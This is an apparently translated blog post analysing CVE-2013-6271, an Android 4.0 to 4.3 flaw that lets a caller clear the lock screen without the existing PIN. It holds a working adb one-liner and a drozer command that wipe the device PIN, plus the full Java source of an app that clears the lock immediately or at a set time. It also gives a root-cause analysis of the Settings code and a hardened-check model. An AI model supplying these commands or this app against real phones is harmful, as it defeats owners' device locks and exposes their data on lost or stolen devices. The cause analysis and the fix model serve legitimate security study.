
Bypassing the Android device lock

2013-12-02 21:50
I hear that a "no root, no recovery" device lock vulnerability was disclosed in the last few days.

Source: https://cureblog.de/2013/11/cve-2013-6271-remove-device-locks-from-android-phone/

Affected versions:

4.0 - vulnerable
4.1 - vulnerable
4.2 - vulnerable
4.3 - vulnerable
4.4 - not vulnerable


Interested readers may first read: http://developer.android.com/guide/topics/admin/device-admin.html

1. Testing

Let's test it: first set a device PIN:



Only one line is needed:

[code]
adb shell am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task
[/code]

The device PIN really is gone.





Someone has also packaged this into an app, so adb is no longer needed.

CRT-Removelocks.apk

CRT-Removelocks source code

[code]
package com.curesec.android;

import android.app.IntentService;
import android.content.ComponentName;
import android.content.Intent;
import android.os.IBinder;

public class RemoveLocks extends IntentService {

    public RemoveLocks() {
        super("RemoveLocks");
    }

    @Override
    protected void onHandleIntent(Intent intent) {
        removeLocks();
    }
[/code]

If you understand this snippet, you understand all of it: this is the secret of how the lock disappears!

[code]
    private void removeLocks() {
        Intent intent = new Intent();
        intent.setComponent(new ComponentName("com.android.settings",
                "com.android.settings.ChooseLockGeneric"));
        intent.putExtra("confirm_credentials", false);
        // 0 is PASSWORD_QUALITY_UNSPECIFIED: "The policy has no requirements for the password."
        intent.putExtra("lockscreen.password_type", 0);
        // FLAG_ACTIVITY_NEW_TASK is a static constant of Intent (the original referenced it through the instance)
        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        startActivity(intent);
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}
[/code]

[code]
package com.curesec.android;

import java.util.Calendar;

import android.app.Activity;
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.view.Menu;
import android.view.View;
import android.widget.Button;
import android.widget.TimePicker;
import android.widget.Toast;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Button buttonExecuteNow = (Button) findViewById(R.id.button1);
        Button buttonExecuteLater = (Button) findViewById(R.id.button2);
        TimePicker tp = (TimePicker) findViewById(R.id.timePicker1);
        tp.setIs24HourView(true);
        tp.setCurrentHour(Calendar.getInstance().get(Calendar.HOUR_OF_DAY));

        // Schedule the RemoveLocks service immediately via AlarmManager.
        buttonExecuteNow.setOnClickListener(new View.OnClickListener() {
            public void onClick(View view) {
                Context context = getBaseContext();
                Intent intent = new Intent(context, RemoveLocks.class);
                AlarmManager alarm = (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
                PendingIntent pending = PendingIntent.getService(context, 0, intent,
                        PendingIntent.FLAG_CANCEL_CURRENT);
                Calendar cal = Calendar.getInstance();
                alarm.set(AlarmManager.RTC_WAKEUP, cal.getTimeInMillis(), pending);
                // Toast durations must be LENGTH_SHORT or LENGTH_LONG (the original passed the literal 5)
                Toast t = Toast.makeText(getBaseContext(), "Removing lock now!", Toast.LENGTH_LONG);
                t.show();
            }
        });

        // Schedule the RemoveLocks service at the time chosen in the TimePicker.
        buttonExecuteLater.setOnClickListener(new View.OnClickListener() {
            public void onClick(View view) {
                Context context = getBaseContext();
                Intent intent = new Intent(context, RemoveLocks.class);
                AlarmManager alarm = (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
                PendingIntent pending = PendingIntent.getService(context, 0, intent,
                        PendingIntent.FLAG_CANCEL_CURRENT);
                Calendar cal = Calendar.getInstance();
                TimePicker tp = (TimePicker) findViewById(R.id.timePicker1);
                cal.set(Calendar.HOUR_OF_DAY, tp.getCurrentHour());
                cal.set(Calendar.MINUTE, tp.getCurrentMinute());
                cal.set(Calendar.SECOND, 0);
                alarm.set(AlarmManager.RTC_WAKEUP, cal.getTimeInMillis(), pending);
                Toast t = Toast.makeText(getBaseContext(),
                        "Removing lock at: " + tp.getCurrentHour() + ":" + tp.getCurrentMinute(),
                        Toast.LENGTH_LONG);
                t.show();
            }
        });
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }
}
[/code]

You can also verify it with drozer. You must have heard of drozer (formerly Mercury)!

[code]
# Disable all phone locks
run app.activity.start --component com.android.settings com.android.settings.ChooseLockGeneric --extra boolean confirm_credentials false --extra integer "lockscreen.password_type" 0
[/code]


2. Cause:

The com.android.settings.ChooseLockGeneric class lets the user change the device lock type, for example to a password, a pattern, or even face recognition; naturally, the existing credential (PIN, pattern, etc.) has to be entered before the change.

Let's examine the following code extracted from the class:

[code]
// Defaults to needing to confirm credentials
final boolean confirmCredentials = getActivity().getIntent()
        .getBooleanExtra(CONFIRM_CREDENTIALS, true);
mPasswordConfirmed = !confirmCredentials;

if (savedInstanceState != null) {
    mPasswordConfirmed = savedInstanceState.getBoolean(PASSWORD_CONFIRMED);
    mWaitingForConfirmation = savedInstanceState.getBoolean(WAITING_FOR_CONFIRMATION);
    mFinishPending = savedInstanceState.getBoolean(FINISH_PENDING);
}

if (mPasswordConfirmed) {
    updatePreferencesOrFinish();
}
...
private void updatePreferencesOrFinish() {
    Intent intent = getActivity().getIntent();
    int quality = intent.getIntExtra(LockPatternUtils.PASSWORD_TYPE_KEY, -1);
    if (quality == -1) {
        // If caller didn't specify password quality, show UI and allow the user to choose.
        quality = intent.getIntExtra(MINIMUM_QUALITY_KEY, -1);
        MutableBoolean allowBiometric = new MutableBoolean(false);
        quality = upgradeQuality(quality, allowBiometric);
        final PreferenceScreen prefScreen = getPreferenceScreen();
        if (prefScreen != null) {
            prefScreen.removeAll();
        }
        addPreferencesFromResource(R.xml.security_settings_picker);
        disableUnusablePreferences(quality, allowBiometric);
    } else {
        updateUnlockMethodAndFinish(quality, false);
    }
}

...
void updateUnlockMethodAndFinish(int quality, boolean disabled) {
    // Sanity check. We should never get here without confirming user's existing password.
    if (!mPasswordConfirmed) {
        throw new IllegalStateException("Tried to update password without confirming it");
    }

    final boolean isFallback = getActivity().getIntent()
            .getBooleanExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK, false);

    quality = upgradeQuality(quality, null);

    if (quality >= DevicePolicyManager.PASSWORD_QUALITY_NUMERIC) {
        int minLength = mDPM.getPasswordMinimumLength(null);
        if (minLength < MIN_PASSWORD_LENGTH) {
            minLength = MIN_PASSWORD_LENGTH;
        }
        final int maxLength = mDPM.getPasswordMaximumLength(quality);
        Intent intent = new Intent().setClass(getActivity(), ChooseLockPassword.class);
        intent.putExtra(LockPatternUtils.PASSWORD_TYPE_KEY, quality);
        intent.putExtra(ChooseLockPassword.PASSWORD_MIN_KEY, minLength);
        intent.putExtra(ChooseLockPassword.PASSWORD_MAX_KEY, maxLength);
        intent.putExtra(CONFIRM_CREDENTIALS, false);
        intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
                isFallback);
        if (isFallback) {
            startActivityForResult(intent, FALLBACK_REQUEST);
            return;
        } else {
            mFinishPending = true;
            intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
            startActivity(intent);
        }
    } else if (quality == DevicePolicyManager.PASSWORD_QUALITY_SOMETHING) {
        Intent intent = new Intent(getActivity(), ChooseLockPattern.class);
        intent.putExtra("key_lock_method", "pattern");
        intent.putExtra(CONFIRM_CREDENTIALS, false);
        intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
                isFallback);
        if (isFallback) {
            startActivityForResult(intent, FALLBACK_REQUEST);
            return;
        } else {
            mFinishPending = true;
            intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
            startActivity(intent);
        }
    } else if (quality == DevicePolicyManager.PASSWORD_QUALITY_BIOMETRIC_WEAK) {
        Intent intent = getBiometricSensorIntent();
        mFinishPending = true;
        startActivity(intent);
    } else if (quality == DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED) {
        mChooseLockSettingsHelper.utils().clearLock(false);
        mChooseLockSettingsHelper.utils().setLockScreenDisabled(disabled);
        getActivity().setResult(Activity.RESULT_OK);
        finish();
    } else {
        finish();
    }
}
[/code]

The first piece of code lets the caller control whether confirmation of the existing credential is required before the lock mechanism is changed.


We can steer the flow to reach the updatePreferencesOrFinish() method, and we see that if we supply a password type the flow continues into updateUnlockMethodAndFinish(). There we can see that if the password type is PASSWORD_QUALITY_UNSPECIFIED, the code that gets executed effectively unlocks the device.


Crafting the input accordingly is enough to bypass the check.

Set the password quality
The password quality can be one of the following DevicePolicyManager constants:

PASSWORD_QUALITY_ALPHABETIC: The user must enter a password containing at least alphabetic (or other symbol) characters.
PASSWORD_QUALITY_ALPHANUMERIC: The user must enter a password containing at least both numeric and alphabetic (or other symbol) characters.
PASSWORD_QUALITY_NUMERIC: The user must enter a password containing at least numeric characters.
PASSWORD_QUALITY_SOMETHING: The policy requires some kind of password, but doesn't care what it is.
PASSWORD_QUALITY_UNSPECIFIED: The policy has no requirements for the password.
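The root cause the excerpt shows is an exported activity whose security decision (has the user confirmed the existing credential?) is taken from a caller-supplied intent extra. The plain-Java model below is added here as an illustration; it is not code from the AOSP Settings app, from the 4.4 fix, or from the CRT-Removelocks source. It puts the vulnerable decision beside a hardened one that only honours the extra when the request enters through a non-exported, in-package entry point. The class, method and enum names are hypothetical; the extra keys and the value 0 are the ones used on this page, and an Intent's extras are modelled as a Map so the file runs with plain javac/java.

```java
import java.util.HashMap;
import java.util.Map;

// Added example, not AOSP or CRT-Removelocks code: models ChooseLockGeneric's decision
// from the two caller-controlled extras. Class, method and enum names are hypothetical.
public class LockChangePolicy {
    // Extra keys and value exactly as used on the page.
    static final String CONFIRM_CREDENTIALS = "confirm_credentials";
    static final String PASSWORD_TYPE_KEY = "lockscreen.password_type";
    static final int PASSWORD_QUALITY_UNSPECIFIED = 0;   // value of the DevicePolicyManager constant

    enum Outcome { CONFIRM_FIRST, SHOW_PICKER, CHANGE_LOCK, CLEAR_LOCK }

    /** Vulnerable (4.0-4.3 shape): the extra alone decides whether the old credential
     *  counts as confirmed. fromInternalEntry is accepted but ignored, as in the excerpt. */
    static Outcome vulnerable(Map<String, Object> extras, boolean fromInternalEntry) {
        boolean confirmCredentials = (Boolean) extras.getOrDefault(CONFIRM_CREDENTIALS, true);
        boolean passwordConfirmed = !confirmCredentials;
        return route(extras, passwordConfirmed);
    }

    /** Hardened: an extra from an arbitrary caller of the exported activity never relaxes
     *  the check; only a request arriving via a non-exported internal entry point
     *  (android:exported="false" in the manifest) may skip confirmation. */
    static Outcome hardened(Map<String, Object> extras, boolean fromInternalEntry) {
        boolean passwordConfirmed = false;   // default to requiring confirmation
        if (fromInternalEntry) {
            boolean confirmCredentials = (Boolean) extras.getOrDefault(CONFIRM_CREDENTIALS, true);
            passwordConfirmed = !confirmCredentials;
        }
        return route(extras, passwordConfirmed);
    }

    // Mirrors the branches of updatePreferencesOrFinish() / updateUnlockMethodAndFinish().
    private static Outcome route(Map<String, Object> extras, boolean passwordConfirmed) {
        if (!passwordConfirmed) {
            return Outcome.CONFIRM_FIRST;          // user must enter the existing PIN/pattern first
        }
        int quality = (Integer) extras.getOrDefault(PASSWORD_TYPE_KEY, -1);
        if (quality == -1) {
            return Outcome.SHOW_PICKER;            // no quality given: show the lock-type picker
        }
        if (quality == PASSWORD_QUALITY_UNSPECIFIED) {
            return Outcome.CLEAR_LOCK;             // the clearLock(false) branch
        }
        return Outcome.CHANGE_LOCK;                // ChooseLockPassword / ChooseLockPattern branch
    }

    public static void main(String[] args) {
        // Constructed request carrying the same two extras the adb, drozer and app invocations above send.
        Map<String, Object> request = new HashMap<>();
        request.put(CONFIRM_CREDENTIALS, false);
        request.put(PASSWORD_TYPE_KEY, PASSWORD_QUALITY_UNSPECIFIED);

        System.out.println("vulnerable, third-party caller: " + vulnerable(request, false));
        System.out.println("hardened,   third-party caller: " + hardened(request, false));
        System.out.println("hardened,   internal Settings:  " + hardened(request, true));
    }
}
```

With that request, the vulnerable decision returns CLEAR_LOCK for any caller, while the hardened one returns CONFIRM_FIRST for a third-party caller and reaches CLEAR_LOCK only when the request comes through the internal entry point, which is where Settings' own flow stands after it has run the confirmation screen. The important design point is that "internal" is a property the manifest enforces (a non-exported component), not something the intent can claim about itself; any check that reads trust from an extra of an exported component is the same bug in a different place.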

3. Impact:

1. If the phone is lost, the PIN at least gives some protection; but if the user had enabled adb shell, the PIN can be wiped.

2. From 4.2.2 on there is a further safeguard: adb authentication (/article/7616003.html). With a lost phone, getting adb to run is hard!



3. An app exploits this vulnerability and clears the device PIN. What are the consequences? I haven't worked that out yet!

Next, let's analyse the device lock mechanism systematically, and what other ways there are to clear the device lock.

After the movie I'll do an in-depth, systematic analysis of the device lock.

http://we.droidiser.com/viewtopic.php?f=21&t=29

http://en.miui.com/thread-5684-1-1.html

http://oscarmini.com/2013/09/locked-out-how-to-bypass-pattern-lock-on-any-android-device.html


http://www.geeknaut.com/bypass-android-pattern-lock-09198931.html

http://forum.xda-developers.com/showthread.php?t=1722950

http://forum.xda-developers.com/showthread.php?t=2225695

http://forum.xda-developers.com/showthread.php?t=1646108

http://forum.xda-developers.com/showthread.php?t=2437946

http://www.morethantechnical.com/2013/01/29/a-creative-way-to-bypass-pattern-lock-on-android/